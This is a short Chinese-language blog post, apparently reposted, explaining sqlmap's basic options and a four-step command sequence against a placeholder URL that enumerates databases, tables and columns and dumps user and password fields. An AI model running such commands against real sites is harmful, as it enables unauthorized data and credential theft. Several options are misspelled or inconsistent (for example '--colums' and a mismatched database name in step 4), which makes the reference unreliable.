sqlmap基础命令

  sqlmap 是一个开源的渗透测试工具,用来自动化检测,利用SQL注入漏洞,获取数据库连接服务器权限。

下载https://github.com/sqlmapproject/sqlmap/zipball/master

swlmap支持MySQL,Oracle,等数据库的各种检测。

注入模式:布尔盲注,根据返回页面条件注入

基础命令

-h ,help   显示基本帮助信息

-hh    显示高级帮助信息

-level=LEVEL   执行测试的等级(1-5,默认1)

-risk=RISK    执行测试的风险(0-3,默认1)

-v   VERBOSE 显示信息的详细级别:0-6(默认为1)

-u  URL,  目标URL

-m  BULKFILE   将目标地址保存在文件中,按照顺序进行批量检测

-r   REQUESTFILF    从文件中加载 HTTP请求,sqlmap可以从文件中获取HTTP请求

-b   获取数据库版本信息

-D  指定数据库名

-T   指定表名

-C  指定字段

-is-dba  当前用户权限(是否为root权限)

-current-db  网站当前数据库

 --string = STRING 在基于布尔的注入时,有的时候返回的页面一次一个样,需要我们自己判断出标志着返回正确页面的标志,会根据页面的返回内容这个标志(字符串)判断真假,可以使用这个参数来制定看见什么字符串就是真。

--dbs 目标服务器中有什么数据库,常用,直接用--dbs

--tables目标数据库有什么表,常用,直接用--tables

--colums目标表中有什么列,常用,直接用--colums

--user 查询一共都有哪些用户,常用,直接用--user

--passwords 查询用户密码的哈希,常用,直接用 --passwords

--dump查询指定范围的全部数据。

 

SQLMAP  用于mysql注入

1>查询数据库     sqlmap.py -u http://www.xxx.com/link.php?id=123  --dbs

2>通过1>的数据库查找表(数据库test)    sqlmap.py  -u http://www.xxx.com/link.php?id=123  -D test  --tables

3>通过2>的表得到列(表名table_id)   sqlmap.py  -u http://www.xxx.com/link.php?id=123  -D test  -T  table_id  --colums

4>通过3>获取字段(user,password字段)   sqlmap.py  -u http://www.xxx.com/link.php?id=123  -D user  -C  user,password  --dump

猜你喜欢

转载自www.cnblogs.com/Scholar-liu/p/11240667.html